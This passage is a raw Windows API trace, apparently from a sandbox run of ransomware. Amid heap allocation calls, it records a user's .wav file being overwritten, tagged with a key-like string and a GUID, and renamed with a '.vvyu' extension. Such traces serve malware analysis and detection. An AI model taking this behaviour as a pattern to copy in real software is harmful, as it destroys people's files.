[0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6848 [0197.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0197.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6860 [0197.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6830 [0197.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68c0 [0197.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0197.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6890 [0197.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6878 [0197.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68d8 [0197.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0197.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6878 [0197.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0197.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0197.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0197.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6848 [0197.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0197.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0197.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0197.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0197.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0197.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0197.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea9b0 | out: hHeap=0x2c0000) returned 1 [0197.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.936] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x6ef4, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x6ef4, lpOverlapped=0x0) returned 1 [0197.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.937] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6ef9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.937] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.938] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.939] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.939] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.939] CloseHandle (hObject=0x584) returned 1 [0197.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0197.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0197.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0197.941] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\LPB-FW9jvpM0h.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\lpb-fw9jvpm0h.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\LPB-FW9jvpM0h.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\lpb-fw9jvpm0h.wav.vvyu")) returned 1 [0197.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.943] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0197.946] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36e12b60, ftCreationTime.dwHighDateTime=0x1d89fab, ftLastAccessTime.dwLowDateTime=0xc75fbe80, ftLastAccessTime.dwHighDateTime=0x1d8a13c, ftLastWriteTime.dwLowDateTime=0xc75fbe80, ftLastWriteTime.dwHighDateTime=0x1d8a13c, nFileSizeHigh=0x0, nFileSizeLow=0x6ef9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LPB-FW9jvpM0h.wav", cAlternateFileName="LPB-FW~1.WAV")) returned 0 [0197.946] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0197.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0197.947] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0197.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0197.947] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0197.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0197.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 